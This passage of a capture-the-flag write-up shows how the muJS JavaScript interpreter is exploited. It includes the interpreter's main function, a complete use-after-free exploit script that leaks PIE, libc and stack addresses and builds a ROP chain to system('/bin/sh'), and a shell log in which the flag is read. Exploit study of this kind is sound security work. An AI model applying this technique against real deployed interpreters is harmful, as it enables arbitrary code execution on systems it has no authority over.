    while ((c = xgetopt(argc, argv, "is")) != -1) {
        switch (c) {
        default: usage(); break;
        case 'i': interactive = 1; break;
        case 's': strict = 1; break;
        }
    }

    J = js_newstate(NULL, NULL, strict ? JS_STRICT : 0);

    js_newcfunction(J, jsB_gc, "gc", 0);
    js_setglobal(J, "gc");

    js_newcfunction(J, jsB_compile, "compile", 2);
    js_setglobal(J, "compile");

    js_newcfunction(J, jsB_print, "print", 0);
    js_setglobal(J, "print");

    js_newcfunction(J, jsB_write, "write", 0);
    js_setglobal(J, "write");

    js_newcfunction(J, jsB_repr, "repr", 0);
    js_setglobal(J, "repr");

    js_newcfunction(J, jsB_quit, "quit", 1);
    js_setglobal(J, "quit");

    js_dostring(J, require_js);
    js_dostring(J, stacktrace_js);

    if (xoptind == argc) {
        interactive = 1;
    } else {
        c = xoptind++;

        js_newarray(J);
        i = 0;
        while (xoptind < argc) {
            js_pushstring(J, argv[xoptind++]);
            js_setindex(J, -2, i++);
        }
        js_setglobal(J, "scriptArgs");

        if (js_dofile(J, argv[c]))
            status = 1;
    }

    if (interactive) {
        if (isatty(0)) {
            using_history();
            rl_bind_key('\t', rl_insert);
            input = readline(PS1);
            while (input) {
                eval_print(J, input);
                if (*input)
                    add_history(input);
                free(input);
                input = readline(PS1);
            }
            putchar('\n');
        } else {
            input = read_stdin();
            if (!input || !js_dostring(J, input))
                status = 1;
            free(input);
        }
    }

    js_gc(J, 0);
    js_freestate(J);

    return status;
}

We note that this function does return, after calling the garbage collector once more. To prevent it from freeing invalid memory, we can fix the mem pointer to point back to its original buffer, but we do this after we adjust its buffer to point to the stack address that stores the return address of main to write a ROP.

main_ret = stack + 0x26eb8

poprdi = piebase + 0x0000000000004d9d
system = libcbase + 0x55410
binsh = libcbase + 0x1b75aa

rop = [poprdi, binsh, poprdi+1, system]

// get ready for rop
low = parseInt(main_ret.toString(16).substring(4, 12), 16)
high = parseInt(main_ret.toString(16).substring(0, 4), 16)
arr.set(8, low)
arr.set(9, high)

for (i = 0; i < rop.length * 2; i += 2)
{
    low = parseInt(rop[i/2].toString(16).substring(4, 12), 16)
    high = parseInt(rop[i/2].toString(16).substring(0, 4), 16)
    target.set(i, low)
    target.set(i+1, high)
}



// fix backing buffer, jemalloc is find with some double frees i guess
low = parseInt(original.toString(16).substring(4, 12), 16)
high = parseInt(original.toString(16).substring(0, 4), 16)
arr.set(8, low)
arr.set(9, high)

Final Exploit

function gc(a, b, buf)
{
    for (i = 0; i < a; i++)
    {
        new Uint32Array(b);
    }
    new Uint32Array(buf);
}

arraybuf = new ArrayBuffer(97);
arr = Uint32Array(arraybuf);
gc(10000, 2, arraybuf); // cause this to become a dangling pointer for UAF
while (true)
{
    target = new Uint32Array(200);
    if (arr.get(0) != 0)
    {
        print("found overlap!");
        break;
    }
}
// TypedArray items are in union after prototype, prototype at index 6 and 7
piebase = parseInt(arr.get(3).toString(16) + arr.get(2).toString(16), 16) - 278688
print('pie base: 0x' + piebase.toString(16))
heapleak = parseInt(arr.get(7).toString(16) + arr.get(6).toString(16), 16)
print('heap leak: 0x' + heapleak.toString(16))
main_got = piebase + 0x43fd8

print('__libc_start_main@got: 0x' + main_got.toString(16))

low = parseInt(main_got.toString(16).substring(4, 12), 16)
high = parseInt(main_got.toString(16).substring(0, 4), 16)

original = parseInt(arr.get(9).toString(16) + arr.get(8).toString(16), 16)

arr.set(8, low)
arr.set(9, high)
libcbase = parseInt(target.get(1).toString(16) + target.get(0).toString(16), 16) - 0x26fc0
print('libc base: 0x' + libcbase.toString(16))
environ = libcbase + 0x1ef2e0
low = parseInt(environ.toString(16).substring(4, 12), 16)
high = parseInt(environ.toString(16).substring(0, 4), 16)
arr.set(8, low)
arr.set(9, high)
stack = parseInt(target.get(1).toString(16) + target.get(0).toString(16), 16) - 0x26fc0
print('stack leak: 0x' + stack.toString(16))

main_ret = stack + 0x26eb8

poprdi = piebase + 0x0000000000004d9d
system = libcbase + 0x55410
binsh = libcbase + 0x1b75aa

rop = [poprdi, binsh, poprdi+1, system]

// get ready for rop
low = parseInt(main_ret.toString(16).substring(4, 12), 16)
high = parseInt(main_ret.toString(16).substring(0, 4), 16)
arr.set(8, low)
arr.set(9, high)

for (i = 0; i < rop.length * 2; i += 2)
{
    low = parseInt(rop[i/2].toString(16).substring(4, 12), 16)
    high = parseInt(rop[i/2].toString(16).substring(0, 4), 16)
    target.set(i, low)
    target.set(i+1, high)
}



// fix backing buffer, jemalloc is find with some double frees i guess
low = parseInt(original.toString(16).substring(4, 12), 16)
high = parseInt(original.toString(16).substring(0, 4), 16)
arr.set(8, low)
arr.set(9, high)

Just like the last one, we had to reopen stdout.

zh3r0-CTF
exec 1>&0
ls
connect.py
flag
libjemalloc.so.2
mujs
run.sh
start.sh
ynetd
cat flag
zh3r0{yierath6Ohlie2oS8oofaeghoobai5Ie}

Concluding Thoughts

The pwnables made by codacker (BabyArmROP) and hk (More Printf and the muJS challenges) were very fun and enjoyable! We look forward to seeing what this CTF has to offer in the future.